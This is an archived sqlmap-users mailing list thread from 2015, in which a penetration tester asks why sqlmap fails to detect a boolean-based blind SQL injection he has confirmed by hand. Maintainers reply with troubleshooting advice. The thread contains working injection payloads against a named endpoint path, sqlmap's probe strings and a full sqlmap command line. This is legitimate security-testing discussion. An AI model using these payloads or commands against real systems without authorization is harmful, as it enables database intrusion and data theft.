Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQ
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQLi
|
From: Brandon P. <bpe...@gm...> - 2015-04-28 14:07:54
|
Technically, it shouldn't* On Tue, Apr 28, 2015 at 9:07 AM, Brandon Perry <bpe...@gm...> wrote: > The injections I see like those are all suffixed with the start of a > comment (# or --). So, technically it should matter if single quotes are > used in the latter part of the boolean clause. > > For instance, SELECT * FROM blah WHERE foo = 'fdsa' with value 'fdsa' > being injectable. Using fdsa' AND 1=1# would result with the trailing > single quote being part of the comment and ignored by MySQL. > > Can you exploit the injection by hand using 1=1# or 1=1--? > > On Tue, Apr 28, 2015 at 8:15 AM, Alistair Johnson <amc...@gm...> > wrote: > >> Hi Brandon, >> >> Thanks for your comment. Confirming that i've tried risk=3 with >> level=5 with the same results. I've looked more closely at the >> requests that sqlmap is sending to check if the parameter is >> injectable. It is testing the Sec paramater with values such as: >> >> PackageSelection) AND 1477=7114 >> PackageSelection) AND 1631=1631 >> PackageSelection') AND 5603=7729 >> PackageSelection') AND 1631=1631 >> PackageSelection' AND 3943=9381 >> PackageSelection' AND 1631=1631 >> PackageSelection" AND 3324=4690 >> PackageSelection" AND 1631=1631 >> PackageSelection) AND 4734=6616 AND (6346=6346 >> PackageSelection)) AND 7350=9272 AND (8861=8861 >> >> When in fact, i assume it would need to use logic like I used to get >> distinguishable responses: >> >> PackageSelection (returns response A) >> PackageSelection' AND '1'='1 (returns response A) >> PackageSelection' AND '1'='2 (returns response B) >> >> In a nutshell, it doesn't appear to be trying single quotes and values >> in the ' AND '1'='1 pattern. But i would have thought this is a pretty >> typical format for checking boolean-based blind SQLi. >> >> Cheers, >> >> Alistair. >> >> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry >> <bpe...@gm...> wrote: >> > It's a GET, so there wouldn't be a content type, unless I am mistaken. >> > >> > Alistair, have you tried --risk=3 with --level=5 yet? >> > >> > Sent from a phone >> > >> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar < >> mir...@gm...> >> > wrote: >> > >> > Can you please send the unredacted content of request.txt to my address? >> > >> > If not, then please at least send me the content of traffic file which >> you >> > can obtain by just appending the "-t traffic.txt" to the regular >> sqlmap's >> > run. >> > >> > Bye >> > >> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson < >> amc...@gm...> >> > wrote: >> >> >> >> Thanks for the quick reply. >> >> >> >> The contents of the request file are as follows: >> >> >> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1 >> >> Host: <redacted> >> >> Accept: */* >> >> Accept-Language: en >> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; >> >> x64; Trident/5.0) >> >> Connection: close >> >> Referer: <redacted> >> >> Cookie: <redacted> >> >> >> >> I've redacted some of the details as it's not appropriate to draw >> >> attention to an internet facing application's SQLi vulnerability. >> >> >> >> When providing the request file as part of the following command: >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string >> >> 'industries' -v 1 >> >> >> >> sqlmap executes as normal but cannot identify (and therefore cannot >> >> exploit) the boolean-based blind vulnerability which I've verified >> >> manually. >> >> >> >> Thanks again, >> >> >> >> Al. >> >> >> >> >> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar >> >> <mir...@gm...> wrote: >> >> > And what is the content of request file? >> >> > >> >> > Bye >> >> > >> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson >> >> > <amc...@gm...> >> >> > wrote: >> >> >> >> >> >> Hi sqlmappers, >> >> >> >> >> >> I'm a fairly experienced user of sqlmap having used it extensively >> in >> >> >> the past. I came across what appeared to pretty typical >> boolean-based >> >> >> blind SQLi in an application I'm (legally) testing. However, for the >> >> >> first time, I'm unable to get sqlmap to recognise the parameter as >> >> >> vulnerable to exploit it further. And as we know, manually >> exploiting >> >> >> blind SQLi is cumbersome to say the least. >> >> >> >> >> >> Here is a summary of the requests i've made to manually confirm the >> >> >> vulnerability. >> >> >> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A) >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns >> response >> >> >> A) >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns >> response >> >> >> B) >> >> >> >> >> >> I've tried various sqlmap flags and thought the following command >> >> >> would give me the best chance of success: >> >> >> >> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' >> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string >> >> >> 'industries' -v 1 >> >> >> >> >> >> Note: the string 'industries' is text that appears in response A but >> >> >> not response B. >> >> >> >> >> >> I've looked at the requests that sqlmap is sending in the background >> >> >> (proxied through burp). It appears that it's attempting to exploit >> >> >> this with the AND statement as it should but is not using single >> >> >> quotes as per my example above. >> >> >> >> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd >> be >> >> >> more than happy to contribute some time to improve it so it can >> >> >> identify injectable parameters such as these in the future. >> >> >> >> >> >> Thanks, >> >> >> >> >> >> Al. >> >> >> >> >> >> >> >> >> >> >> >> >> ------------------------------------------------------------------------------ >> >> >> One dashboard for servers and applications across >> >> >> Physical-Virtual-Cloud >> >> >> Widest out-of-the-box monitoring support with 50+ applications >> >> >> Performance metrics, stats and reports that give you Actionable >> >> >> Insights >> >> >> Deep dive visibility with transaction tracing using APM Insight. >> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y >> >> >> _______________________________________________ >> >> >> sqlmap-users mailing list >> >> >> sql...@li... >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > >> >> > >> >> > >> >> > >> >> > -- >> >> > Miroslav Stampar >> >> > http://about.me/stamparm >> > >> > >> > >> > >> > -- >> > Miroslav Stampar >> > http://about.me/stamparm >> > >> > >> ------------------------------------------------------------------------------ >> > One dashboard for servers and applications across Physical-Virtual-Cloud >> > Widest out-of-the-box monitoring support with 50+ applications >> > Performance metrics, stats and reports that give you Actionable Insights >> > Deep dive visibility with transaction tracing using APM Insight. >> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y >> > >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
